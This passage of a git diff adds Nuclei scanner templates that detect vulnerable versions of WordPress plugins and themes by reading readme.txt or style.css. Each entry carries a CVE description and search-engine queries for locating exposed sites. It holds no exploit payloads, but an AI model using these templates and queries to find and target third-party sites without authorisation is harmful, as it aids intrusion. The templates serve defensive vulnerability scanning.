+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "store-locator-le"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2311.17.01')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml b/poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml
new file mode 100644
index 0000000000..7d86a18f26
--- /dev/null
+++ b/poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6
+
+info:
+ name: >
+ Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Order Export for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.23. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43259
+ metadata:
+ fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-43259'
+ tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "order-export-and-more-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.23')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml b/poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml
new file mode 100644
index 0000000000..74b098c79e
--- /dev/null
+++ b/poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c
+
+info:
+ name: >
+ Clearfy Cache <= 2.2.3 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43260
+ metadata:
+ fofa-query: "wp-content/plugins/clearfy/"
+ google-query: inurl:"/wp-content/plugins/clearfy/"
+ shodan-query: 'vuln:CVE-2024-43260'
+ tags: cve,wordpress,wp-plugin,clearfy,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clearfy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml b/poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml
new file mode 100644
index 0000000000..6acdc8e51e
--- /dev/null
+++ b/poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43261-678706860c4e57cd059d9f119dea313a
+
+info:
+ name: >
+ Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The Compute Links plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43261
+ metadata:
+ fofa-query: "wp-content/plugins/compute-links/"
+ google-query: inurl:"/wp-content/plugins/compute-links/"
+ shodan-query: 'vuln:CVE-2024-43261'
+ tags: cve,wordpress,wp-plugin,compute-links,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "compute-links"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml b/poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml
new file mode 100644
index 0000000000..0b37abb3d7
--- /dev/null
+++ b/poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43262-1a861225d324308d9705bd093a6382ee
+
+info:
+ name: >
+ Busiprof <= 2.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Busiprof theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0acf3219-1443-42cc-b3c9-cffb8fd8af07?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43262
+ metadata:
+ fofa-query: "wp-content/themes/busiprof/"
+ google-query: inurl:"/wp-content/themes/busiprof/"
+ shodan-query: 'vuln:CVE-2024-43262'
+ tags: cve,wordpress,wp-theme,busiprof,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/busiprof/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "busiprof"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml b/poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml
new file mode 100644
index 0000000000..5e8eea816e
--- /dev/null
+++ b/poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43263-239fd68ccb4495d13837323dbe18444e
+
+info:
+ name: >
+ Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Visual Composer Starter theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43263
+ metadata:
+ fofa-query: "wp-content/themes/visual-composer-starter/"
+ google-query: inurl:"/wp-content/themes/visual-composer-starter/"
+ shodan-query: 'vuln:CVE-2024-43263'
+ tags: cve,wordpress,wp-theme,visual-composer-starter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "visual-composer-starter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml b/poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml
new file mode 100644
index 0000000000..6a2d7268f1
--- /dev/null
+++ b/poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4
+
+info:
+ name: >
+ Create by Mediavine <= 1.9.8 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Create by Mediavine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c04e40a-6d94-4688-9159-07bf27a9efe0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43264
+ metadata:
+ fofa-query: "wp-content/plugins/mediavine-create/"
+ google-query: inurl:"/wp-content/plugins/mediavine-create/"
+ shodan-query: 'vuln:CVE-2024-43264'
+ tags: cve,wordpress,wp-plugin,mediavine-create,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mediavine-create/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mediavine-create"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml b/poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml
new file mode 100644
index 0000000000..b77df5cb64
--- /dev/null
+++ b/poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592
+
+info:
+ name: >
+ Analytify <= 5.3.1 - Cross-Site Request Forgery to Opt-out
+ author: topscoder
+ severity: medium
+ description: >
+ The Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3.1. This is due to missing or incorrect nonce validation on the optout_yes() function. This makes it possible for unauthenticated attackers to opt out of tracking via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e407409-989d-48f8-8135-6071015a6064?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43265
+ metadata:
+ fofa-query: "wp-content/plugins/wp-analytify/"
+ google-query: inurl:"/wp-content/plugins/wp-analytify/"
+ shodan-query: 'vuln:CVE-2024-43265'
+ tags: cve,wordpress,wp-plugin,wp-analytify,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-analytify/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-analytify"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml b/poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml
new file mode 100644
index 0000000000..deaacbd8f6
--- /dev/null
+++ b/poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7
+
+info:
+ name: >
+ WP Job Portal <= 2.1.6 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.6 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/630e4595-4be3-4886-8771-f781bcee674d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43266
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:CVE-2024-43266'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml b/poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml
new file mode 100644
index 0000000000..ede979ccb8
--- /dev/null
+++ b/poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16
+
+info:
+ name: >
+ Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Mega Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a64c67de-1c16-4dcb-a3e4-81341b37c3e3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43267
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/ultimate-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-43267'
+ tags: cve,wordpress,wp-plugin,ultimate-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml b/poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml
new file mode 100644
index 0000000000..003ee9c4b1
--- /dev/null
+++ b/poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe
+
+info:
+ name: >
+ Backup and Restore WordPress <= 1.50 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/61a050bd-deaa-4115-baa5-f63790816450?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43268
+ metadata:
+ fofa-query: "wp-content/plugins/wp-backitup/"
+ google-query: inurl:"/wp-content/plugins/wp-backitup/"
+ shodan-query: 'vuln:CVE-2024-43268'
+ tags: cve,wordpress,wp-plugin,wp-backitup,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-backitup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.50')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml b/poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml
new file mode 100644
index 0000000000..7f125af4b7
--- /dev/null
+++ b/poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6
+
+info:
+ name: >
+ Backup and Restore WordPress <= 1.50 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Backup and Restore WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa15939c-44eb-45e5-95d7-49307912f21c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43269
+ metadata:
+ fofa-query: "wp-content/plugins/wp-backitup/"
+ google-query: inurl:"/wp-content/plugins/wp-backitup/"
+ shodan-query: 'vuln:CVE-2024-43269'
+ tags: cve,wordpress,wp-plugin,wp-backitup,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-backitup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.50')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml b/poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml
new file mode 100644
index 0000000000..143b5e70a9
--- /dev/null
+++ b/poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43270-00633de45e44065b1555bce09f62fb9d
+
+info:
+ name: >
+ Backup and Restore WordPress <= 1.50 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f35838f-4a7d-4d25-9e5e-956411e59b62?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43270
+ metadata:
+ fofa-query: "wp-content/plugins/wp-backitup/"
+ google-query: inurl:"/wp-content/plugins/wp-backitup/"
+ shodan-query: 'vuln:CVE-2024-43270'
+ tags: cve,wordpress,wp-plugin,wp-backitup,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-backitup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.50')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml b/poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml
new file mode 100644
index 0000000000..30d4ec8488
--- /dev/null
+++ b/poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af
+
+info:
+ name: >
+ Woo Products Widgets For Elementor <= 2.0.0 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Widgets for WooCommerce Products on Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8336c89-44ac-4e41-bc81-7dae9599c050?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-43271
+ metadata:
+ fofa-query: "wp-content/plugins/woo-products-widgets-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/woo-products-widgets-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-43271'
+ tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-products-widgets-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-products-widgets-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml b/poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml
new file mode 100644
index 0000000000..46e1e47527
--- /dev/null
+++ b/poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083
+
+info:
+ name: >
+ Icegram <= 3.1.24 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Icegram plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the display_messages() function in versions up to, and including, 3.1.24. This makes it possible for unauthenticated attackers to preview campaigns
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/990d62fd-dc55-446e-b3ff-52c7c121aeb8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43272
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:CVE-2024-43272'
+ tags: cve,wordpress,wp-plugin,icegram,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.24')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml b/poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml
